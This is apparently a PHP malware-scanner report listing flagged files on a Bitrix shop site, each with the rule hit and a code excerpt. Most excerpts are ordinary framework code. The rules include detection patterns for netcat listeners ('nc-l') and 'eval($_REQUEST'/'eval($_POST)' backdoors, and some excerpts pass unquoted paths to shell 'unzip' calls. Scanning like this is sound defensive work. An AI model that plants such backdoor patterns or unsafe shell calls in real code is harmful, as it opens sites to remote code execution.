CURRENCY_ID" => $arParams["CURRENCY_ID"],
                    "
HIDE_NOT_AVAILABLE" => $arParams["HIDE_NOT_AVAILABLE"],
                    "
TEMPLATE_THEME" => (isset($arParams["TEMPLATE_THEME"]) ? $arParams["TEMPLATE_THEME"] : ""),

                    "
ADD_PICT_PROP" => (isset($arParams["ADD_PICT_PROP"]) ? $arParams["ADD_PICT_PROP"] : ""),

                    "
LABEL_PROP" => (isset($arParams["LABEL_PROP"]) ? $arParams["LABEL_PROP"] : ""),
                    "
O...

/home/web/web/vsavto.com/public_html/bitrix/wizards/bitrix/demo/scripts/template.php

Size: 15.72 kB Created: 2022-12-02 17:28:16 Modified: 2025-02-03 05:36:22 Warns: 1
DescriptionMatch

Function eval Line: 462 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(response);
            }

            
CAjaxForm.prototype.ShowError = function(errorMessage)
            {
                var 
errorContainer document.getElementById("error_container");
                var 
errorText document.getElementById("error_text");
                if (!
errorContainer || !errorText)
                    return;

                var 
waitWindow document.getElementById("wait");
                if (
waitWindow)
                    
waitWindow.style.display "none";

                
errorContainer.style.display 'block';
                
errorText.innerHTML strip_tags(errorMessage);

                var 
retryButton = ...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/catalog.element/templates/.default/template.php

Size: 64.58 kB Created: 2022-12-02 17:28:20 Modified: 2025-02-03 05:36:25 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 1132 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
                                '
CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
                                '
BASKET_URL' => $arParams['BASKET_URL'],
                                '
ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
                                '
PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
                                '
PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
                                '
USE_PRODUCT_QUANTITY' => 'N',
                                '
PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/catalog.element/templates/bootstrap_v4/template.php

Size: 64.75 kB Created: 2022-12-02 17:28:20 Modified: 2025-02-03 05:36:25 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 1167 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
                        '
CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
                        '
BASKET_URL' => $arParams['BASKET_URL'],
                        '
ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
                        '
PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
                        '
PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
                        '
USE_PRODUCT_QUANTITY' => 'N',
                        '
PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'],
                        '
CACH...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/catalog.element/templates/store_v3/template.php

Size: 67.30 kB Created: 2022-12-02 17:28:20 Modified: 2025-02-03 05:36:25 Dangers: 1
DescriptionMatch

Exploit clever_include Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE' => $arParams['PRICE_VAT_INCLUDE'], 'CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'], 'BASKET_URL' => $arParams['BASKET_URL'], 'ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'], 'PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'], 'PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'], 'USE_PRODUCT_QUANTITY' => 'N', 'PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'], 'CACHE_GROUPS' => $arParams['CACHE_GROUPS'], 'POTENTI...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/landing.start/lang/en/component.php

Size: 5.85 kB Created: 2022-12-02 17:28:22 Modified: 2025-02-03 05:36:25 Dangers: 1
DescriptionMatch

Sign 301ca578 Line: 36 Dangerous

Malware Signature (hash: 301ca578)

Trojan

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/landing.start/lang/de/component.php

Size: 6.55 kB Created: 2022-12-02 17:28:22 Modified: 2025-02-03 05:36:25 Dangers: 1
DescriptionMatch

Sign 301ca578 Line: 36 Dangerous

Malware Signature (hash: 301ca578)

Trojan

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/sale.location.import/templates/.default/template.php

Size: 15.64 kB Created: 2022-12-02 17:28:24 Modified: 2025-02-03 05:36:26 Dangers: 1
DescriptionMatch

Sign 7830f7a6 Line: 11 Dangerous

Malware Signature (hash: 7830f7a6)

nc-l

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/sale.location.import/templates/admin/template.php

Size: 13.68 kB Created: 2022-12-02 17:28:24 Modified: 2025-02-03 05:36:26 Dangers: 1
DescriptionMatch

Sign 7830f7a6 Line: 17 Dangerous

Malware Signature (hash: 7830f7a6)

nc-l

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/catalog.sections.top/component.php

Size: 17.92 kB Created: 2022-12-02 17:28:25 Modified: 2025-02-03 05:36:26 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 180 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php

Size: 9.56 kB Created: 2022-12-02 17:28:31 Modified: 2025-02-03 05:36:26 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("var result = " data "; "); }
            if (
result['status'] == 'inprogress')
            {
                
document.getElementById('photogallery_recalc').innerHTML result['text'];
                if (
__this_source.bReady == false)
                {
                    
document.getElementById('ButtonPhotoGalleryRecalcStart').disabled false;
                    
document.getElementById('ButtonPhotoGalleryRecalcContinue').disabled false;
                    
document.getElementById('ButtonPhotoGalleryRecalcStop').disabled true;
                }
                else
                {
                    
document.getElementById(...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/sale.ajax.delivery.calculator/templates/.default/ajax.php

Size: 0.99 kB Created: 2022-12-02 17:28:32 Modified: 2025-02-03 05:36:26 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 15 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/sale.ajax.delivery.calculator/templates/input/ajax.php

Size: 864.00 B Created: 2022-12-02 17:28:32 Modified: 2025-02-03 05:36:26 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 15 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/main.ui.grid/templates/.default/template.php

Size: 49.30 kB Created: 2022-12-02 17:28:34 Modified: 2025-02-03 05:36:26 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=CUtil::phpToJSObject($arResult["DATA_FOR_EDIT"])?>);
        var defaultColumns = eval(<?=CUtil::phpToJSObject($arResult["DEFAULT_COLUMNS"])?>);
        var Grid = BX.Main.gridManager.getById('<?=\CUtil::JSEscape($arParams["GRID_ID"])?>');
        var messages = eval(<?=CUtil::phpToJSObject($arResult["MESSAGES"])?>);
        var currentPage = '<?=\CUtil::JSEscape($arParams["CURRENT_PAGE"])?>';

        Grid = Grid ? Grid.instance : null;

        if (Grid)
        {
            Grid.arParams.DEFAULT_COLUMNS = defaultColumns;
            Grid.arPa...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/forum.rules/lang/en/component.php

Size: 4.71 kB Created: 2022-12-02 17:28:38 Modified: 2025-02-03 05:36:26 Dangers: 1
DescriptionMatch

Sign 407651f7 Line: 27 Dangerous

Malware Signature (hash: 407651f7)

warez

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/mobileapp.menu/templates/.default/template.php

Size: 12.57 kB Created: 2022-12-02 17:28:39 Modified: 2025-02-03 05:36:27 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec("showAuthForm");
                }
            }
    <?endif;
?>

    if(BX.PULL)
    {
        BX.addCustomEvent("onPullExtendWatch", function(data) {
            BX.PULL.extendWatch(data.id);
        });

        BX.addCustomEvent("thisPageWillDie", function(data) {
            BX.PULL.clearWatch(data.page_id);
        });

        BX.addCustomEvent("onPullEvent", function (module_id, command, params)
        {
            if (module_id == 'main' && (command == 'user_authorize' || command == 'user_logout' || command == 'online_list'))
            {
                //app.onCustomEvent('onPullOnline', {...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/lists.element.edit/component.php

Size: 33.70 kB Created: 2022-12-02 17:28:40 Modified: 2025-02-03 05:36:27 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 606 Dangerous

Malware Signature (hash: 11413268)

eval($_POST

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/script.php

Size: 11.35 kB Created: 2022-12-02 17:28:41 Modified: 2025-02-03 05:36:27 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/script.php

Size: 22.93 kB Created: 2022-12-02 17:28:41 Modified: 2025-02-03 05:36:27 Warns: 1
DescriptionMatch

Function eval Line: 97 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/report.view/templates/admin/template.php

Size: 55.11 kB Created: 2022-12-02 17:28:42 Modified: 2025-02-03 05:36:27 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('response = ' data);
                if (
response)
                {
                    if (
response.imageData)
                    {
                        if (
response.imageData.substr(0,10) === 'data:image')
                        {
                            
img BX('report-chart-image');
                            
img.src response.imageData;
                            if (
response.legendInfo)
                            {
                                var 
legendContainer BX('report-chart-legend-container');
                                var 
legendRowExample BX('report-chart-legend-row-example');
                                var 
chartType requestData['type'];
                                var 
legendNewRowlegendSticklegend...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/scripts_for_editor.php

Size: 14.80 kB Created: 2022-12-02 17:28:43 Modified: 2025-02-03 05:36:27 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(scripts[s].JS);
                        }
                    }
                    
                    
BX.ajax.processScripts(scriptstrue);
//                    commentEr object may be set in template
                    
if(window.commentEr && window.commentEr == "Y")
                    {
                        
BX('err_comment_'+this.id[1]).innerHTML data;
                    }
                    else
                    {
                        if(
BX('edit_id').value 0)
                        {
                            var 
commentId 'blg-comment-'+this.id[1];
                            if(
BX(commentId))
                            {
                                var 
newComment BX.create('div',{'html':data});    // tmp container for data
//                                paste resp...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/blog.post.comment/templates/.default/scripts_for_editor.php

Size: 15.25 kB Created: 2022-12-02 17:28:44 Modified: 2025-02-03 05:36:27 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(scripts[s].JS);
                        }
                    }
                    
                    
BX.ajax.processScripts(scriptstrue);
//                    commentEr object may be set in template
                    
if(window.commentEr && window.commentEr == "Y")
                    {
                        
BX('err_comment_'+this.id[1]).innerHTML data;
                    }
                    else
                    {
                        if(
BX('edit_id').value 0)
                        {
                            var 
commentId 'blg-comment-'+this.id[1];
                            if(
BX(commentId))
                            {
                                var 
newComment BX.create('div',{'html':data});    // tmp container for data
//                                paste resp...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/b24connector.button.list/ajax.php

Size: 4.51 kB Created: 2024-07-17 09:59:08 Modified: 2025-02-03 05:36:27 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->request Context::getCurrent()->getRequest(); $this->action $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse(); } } $controller = new B24CButtonListAjaxController(); $controller->exec()

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/photogallery.detail.list/templates/slider_big/template.php

Size: 16.21 kB Created: 2022-12-02 17:28:45 Modified: 2025-02-03 05:36:27 Warns: 1
DescriptionMatch

Function eval Line: 337 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("div.onclick = function(e){jsUtils.PreventDefault(e); jsUtils.Redirect([], '" res[ii].href "');};");
        
res[ii].parentNode.insertBefore(divres[ii]);
        
res[ii].onmouseover = function()
        {
            
this.previousSibling.onshow();
            
this.bxMouseOver 'Y';
        };
        
res[ii].onmouseout = function()
        {
            
this.bxMouseOver 'N';
            var 
__this this;
            
setTimeout(
                function()
                {
                    if (
__this.previousSibling && __this.previousSibling.bxMouseOver != "Y")
                    {
                        
__this.previousSibling...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/report.construct/templates/.default/template.php

Size: 40.26 kB Created: 2022-12-02 17:28:46 Modified: 2025-02-03 05:36:27 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(ySelects[i].name))
            {
                
colId match[1];
                if (
colId !== null && yColumnsIndexes[colId] !== null)
                    
setSelectValue(ySelects[i], yColumnsIndexes[colId]);
            }
        }
        var 
chartCheckbox BX('report-chart-display-checkbox');
        if (
chartCheckbox)
        {
            
BX.bind(chartCheckbox'click', function () {
                var 
chartSwitchBlock BX('report-chart-switch');
                var 
chartParamsBlock BX('report-chart-params');
                if (
chartSwitchBlock)
                {
                    if (
this.checkedBX.addClass(chartSwitchBloc...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/report.construct/templates/admin/template.php

Size: 40.02 kB Created: 2022-12-02 17:28:46 Modified: 2025-02-03 05:36:27 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(ySelects[i].name))
            {
                
colId match[1];
                if (
colId !== null && yColumnsIndexes[colId] !== null)
                    
setSelectValue(ySelects[i], yColumnsIndexes[colId]);
            }
        }
        var 
chartCheckbox BX('report-chart-display-checkbox');
        if (
chartCheckbox)
        {
            
BX.bind(chartCheckbox'click', function () {
                var 
chartSwitchBlock BX('report-chart-switch');
                var 
chartParamsBlock BX('report-chart-params');
                if (
chartSwitchBlock)
                {
                    if (
this.checkedBX.addClass(chartSwitchBloc...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/photogallery.detail.list.ex/templates/.default/template.php

Size: 12.71 kB Created: 2022-12-02 17:28:52 Modified: 2025-02-03 05:36:28 Warns: 1
DescriptionMatch

Exploit infected_comment Line: 110 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*width*/

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/blog.post.edit/templates/.default/script.php

Size: 26.06 kB Created: 2022-12-02 17:28:53 Modified: 2025-02-03 05:36:28 Warns: 1
DescriptionMatch

Function eval Line: 140 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/sale.location.selector.system/templates/.default/template.php

Size: 17.99 kB Created: 2022-12-02 17:28:53 Modified: 2025-02-03 05:36:28 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system(<?=CUtil::PhpToJSObject(array( 'scope' => 'slss-'.intval($arResult['RANDOM_TAG']), 'source' => $component->getPath().'/get.php''query' => array( 'BEHAVIOUR' => array( 'LANGUAGE_ID' => LANGUAGE_ID ), ), 'editUrl' => '?'.implode('&'$urlComponents), 'parentTagId' => intval($arResult['RANDOM_TAG']), 'useCodes' => $arResult['USE_CODES'], 'types' => $arResult['TYPES'], 'startSearchLen' => $component::START_SEARCH_LEN'pageSize' => $component::PAGE_SIZE'hugeTailLen' => $component::HUGE_TA...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/sale.basket.order.ajax/component.php

Size: 38.65 kB Created: 2022-12-02 17:28:53 Modified: 2025-02-03 05:36:28 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 556 Dangerous

Malware Signature (hash: 11413268)

eVal($_POST

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/sale.notice.product/templates/.default/template.php

Size: 7.43 kB Created: 2022-12-02 17:28:56 Modified: 2025-02-03 05:36:28 Warns: 1
DescriptionMatch

Function eval Line: 130 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval( '('+res+')' );

                            if (
rs['ERRORS'].length 0)
                            {
                                if (
rs['ERRORS'] == 'NOTIFY_ERR_NULL')
                                    
BX('popup_n_error').innerHTML '<?=GetMessageJS('NOTIFY_ERR_NULL')?>';
                                else if (
rs['ERRORS'] == 'NOTIFY_ERR_CAPTHA')
                                    
BX('popup_n_error').innerHTML '<?=GetMessageJS('NOTIFY_ERR_CAPTHA')?>';
                                else if (
rs['ERRORS'] == 'NOTIFY_ERR_MAIL_EXIST')
                                {
                                    
BX('popup_n_error').innerHTML '<?=GetMessageJS('NOTIFY_ERR_MAIL_BUYERS_EXIST')?>';
                        ...

/home/web/web/vsavto.com/public_html/bitrix/components/bitrix/main.map/component.php

Size: 5.84 kB Created: 2022-12-02 17:28:57 Modified: 2025-02-03 05:36:28 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) continue; } $search_child false$search_path ''$full_path ''; if ($aMenu[1] <> '') { if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i"$aMenu[1])) { $full_path $aMenu[1]; } else { $full_path trim(Rel2Abs(mb_substr($PARENT_PATHmb_strlen($_SERVER["DOCUMENT_ROOT"])), $aMenu[1])); $slash_pos mb_strrpos($full_path"/"); if ($slash_pos !== false) { $page mb_substr($full_path$slash_pos 1); if(($pos mb_strpos($page'?')) !== false$pag...

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/classes/general/import.php

Size: 288.70 kB Created: 2022-12-20 11:48:52 Modified: 2025-02-03 05:36:34 Warns: 2
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($expression.';'); } elseif(preg_match('/\$val\s*=[^=]/'$expression)) { eval($expression.';'); $ret $val; } else { $ret = eval('return '.$expression.';'); } }catch(Exception $ex){ $ret $altReturn; } $this->phpExpression null; return $ret; } public function ExecuteOnAfterSaveHandler($handler$ID) { try{ eval($handler.';'); }catch(Exception $ex){} } public function GetNextLoadRow($row$worksheetNum) { $nextRow $row; if(isset($this->params['LIST_ACTIVE'][$worksheetNum])) { while($th...

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec('unzip "'.$arFile['tmp_name'].'" -d '.$archiveParams['path']); if(count(array_diff(scandir($archiveParams['path']), array('.''..'))) > 0$isExtract true; if(!$isExtract && class_exists('ZipArchive')) { $zipObj = new ZipArchive(); if ($zipObj->open(\Bitrix\Main\IO\Path::convertLogicalToPhysical($arFile['tmp_name']))===true) { $isExtract = (bool)($zipObj->extractTo($archiveParams['path']) && count(array_diff(scandir($archiveParams['path']), array('.''..'))) > 0); $zipObj->close(); } } ...

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/classes/general/utils.php

Size: 107.22 kB Created: 2022-12-20 11:48:52 Modified: 2025-02-03 05:36:34 Warns: 2
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($expression.';'); } elseif(preg_match('/\$val\s*=/'$expression)) { eval($expression.';'); return $val; } else { return eval('return '.$expression.';'); } }catch(Exception $ex){ return $altReturn; } } public static function ShowFilter($sTableID$IBLOCK_ID$FILTER) { global $APPLICATION; \CJSCore::Init('file_input'); $sf 'FILTER'Loader::includeModule('iblock'); $bCatalog Loader::includeModule('catalog'); if($bCatalog) { $arCatalog CCatalog::GetByID($IBLOCK_ID); if($arCatalog) { if...

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec('unzip "'.$archiveFn.'" -d '.$tmpsubdir); } } if($arFile['type']=='application/zip' && isset($service) && $service=='yadisk'self::CorrectEncodingForExtractDir($tmpsubdir); $arFile = array(); if(!is_array($path)) $urlComponents parse_url($path); else $urlComponents = array(); if(isset($urlComponents['fragment']) && strlen($urlComponents['fragment']) > 0) { $fn $tmpsubdir.ltrim($urlComponents['fragment'], '/'); $arFiles = array($fn); if((strpos($fn'*')!==false || (strpos($fn'{')!==f...

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/classes/general/import_highload.php

Size: 62.91 kB Created: 2022-12-20 11:48:52 Modified: 2025-02-03 05:36:34 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($expression.';'); } elseif(preg_match('/\$val\s*=[^=]/'$expression)) { eval($expression.';'); return $val; } else { return eval('return '.$expression.';'); } }catch(Exception $ex){ return $altReturn; } } public function ExecuteOnAfterSaveHandler($handler$ID) { try{ eval($handler.';'); }catch(Exception $ex){} } public function GetNextLoadRow($row$worksheetNum) { $nextRow $row; if(isset($this->params['LIST_ACTIVE'][$worksheetNum])) { while($this->CheckSkipLine($nextRow$worksheetNum,...

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/lib/datamanager/iblockelement.php

Size: 52.40 kB Created: 2022-12-20 11:48:52 Modified: 2025-02-03 05:36:34 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('namespace Bitrix\KdaImportexcel\DataManager;'."\r\n"'class ElementProperty'.$arFilter['IBLOCK_ID'].'Table extends ElementPropertyTable{'."\r\n"'public static function getMap(){return parent::getMapForIblock('.$arFilter['IBLOCK_ID'].');}''}'); self::$arIblockClasses[$arFilter['IBLOCK_ID']] = $arFilter['IBLOCK_ID']; } if(count(array_diff($arNeedKeys$arFields))==0) { $mtype 'd7_props'; } else $mtype 'props'; } } } self::$elemListHash[$hash] = $mtype; } $mtype self::$elemListHash...

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/lib/datamanager/iblockelementid_table.php

Size: 2.59 kB Created: 2022-12-20 11:48:41 Modified: 2025-02-03 05:36:34 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('namespace Bitrix\KdaImportexcel\DataManager;'."\r\n"'class '.$className.' extends \Bitrix\Main\Entity\DataManager{'."\r\n"'public static function getTableName(){return "b_iblock_element_prop_s'.$IBLOCK_ID.'";}''public static function getMap(){return array(new \Bitrix\Main\Entity\IntegerField("IBLOCK_ELEMENT_ID", array("primary"=>true)));}''}'); static::$arIblockV2PropTable[$IBLOCK_ID] = '\Bitrix\KdaImportexcel\DataManager\ElementPropertyV2STable'; } } $className = static::$arIblock...

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/lib/PHPExcel/PHPExcel/Reader/Excel5.php

Size: 228.08 kB Created: 2022-12-20 11:48:47 Modified: 2025-02-03 05:36:34 Dangers: 1
DescriptionMatch

Exploit hacked_by Line: 6624 Dangerous

Hacker credits

Hacked by

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/lib/PHPExcel/PHPExcel/Reader/CSV.php

Size: 22.48 kB Created: 2022-12-20 11:48:52 Modified: 2025-02-03 05:36:34 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec('locale -a | grep ru'$arLocates); if(is_array($arLocates) && count($arLocates) > 0) { foreach($arLocates as $loc) { $this->arLocales[ToLower(str_replace('-'''$loc))] = $loc; } } } } protected function _isValidFormat() { return TRUE; } public function setCsvParser($csvparser) { $this->_csvparser $csvparser; } public function getCsvParser() { return $this->_csvparser; } public function setStartFilePosRow($arPos) { $this->_startFilePos $arPos['pos']; $this->_startFileRow $arPos['ro...

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/lib/PHPExcel/PHPExcel/Shared/File.php

Size: 5.19 kB Created: 2022-12-20 11:48:11 Modified: 2025-02-03 05:36:34 Dangers: 1
DescriptionMatch

Sign 471b95ee Line: 174 Dangerous

Malware Signature (hash: 471b95ee)

Suhosin

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/lib/PHPExcel/PHPExcel/Shared/OLERead.php

Size: 9.40 kB Created: 2022-12-20 11:48:11 Modified: 2025-02-03 05:36:34 Dangers: 1
DescriptionMatch

Exploit hacked_by Line: 306 Dangerous

Hacker credits

Hacked by

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/lib/PHPExcel/PHPExcel/Shared/PCLZip/pclzip.lib.php

Size: 198.15 kB Created: 2022-12-20 11:48:50 Modified: 2025-02-03 05:36:34 Dangers: 1
DescriptionMatch

Sign 963e968a Line: 5683 Dangerous

Malware Signature (hash: 963e968a)

php_uname()

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/lib/zip_archive.php

Size: 26.69 kB Created: 2022-12-20 11:48:50 Modified: 2025-02-03 05:36:34 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec('unzip "'.$pFilename.'" -d '.$this->tmpDir); if(count(array_diff(scandir($this->tmpDir), array('.''..')))==0) { $this->setCheckSum(); return true; } } } return false; } public function setCheckSum() { $sum $this->calcCheckSum(); file_put_contents($this->tmpDir.'/.checksum'$sum); } public function getCheckSum() { if(!file_exists($this->tmpDir.'/.checksum')) return ''; return file_get_contents($this->tmpDir.'/.checksum'); } public function calcCheckSum($dir='') { if(strlen($dir)==0$di...

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/admin/iblock_import_excel_field_settings.php

Size: 91.71 kB Created: 2022-12-20 11:48:50 Modified: 2025-02-03 05:36:34 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('$arFieldsParamsInArray = &$P'.$fNameEval.';'); $arFieldsParamsInArray $arFieldParams; } if($_POST['action']) define('PUBLIC_AJAX_MODE''Y'); if($_POST['action']=='export_conv_csv') { $arExtra = array(); \CKDAImportExtrasettings::HandleParams($arExtra, array(array(array('CONVERSION'=>$_POST['CONVERSION'], 'EXTRA_CONVERSION'=>$_POST['EXTRA_CONVERSION']))), false); while(is_array($arExtra) && isset($arExtra[0])) $arExtra $arExtra[0]; $arConv $arExtraConv = array(); if(is_array($arExtra...

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/admin/iblock_import_excel_field_settings_highload.php

Size: 36.70 kB Created: 2022-12-20 11:48:47 Modified: 2025-02-03 05:36:34 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('$arFieldsParamsInArray = &$P'.$fNameEval.';'); $arFieldsParamsInArray $arFieldParams; } if($_POST['action']) define('PUBLIC_AJAX_MODE''Y'); if($_POST['action']=='save' && is_array($_POST['EXTRASETTINGS'])) { $APPLICATION->RestartBuffer(); ob_end_clean(); CKDAImportExtrasettings::HandleParams($PEXTRASETTINGS$_POST['EXTRASETTINGS']); preg_match_all('/\[([_\d]+[_P\d]*)\]/'$fieldName$keys); $oid 'field_settings_'.$keys[1][0].'_'.$keys[1][1]; if($_GET['return_data']) { $returnJson =...

/home/web/web/vsavto.com/public_html/bitrix/modules/kda.importexcel/admin/iblock_import_excel_cron_settings.php

Size: 18.78 kB Created: 2022-12-20 11:48:52 Modified: 2025-02-03 05:36:34 Warns: 1
DescriptionMatch

Function exec Warning

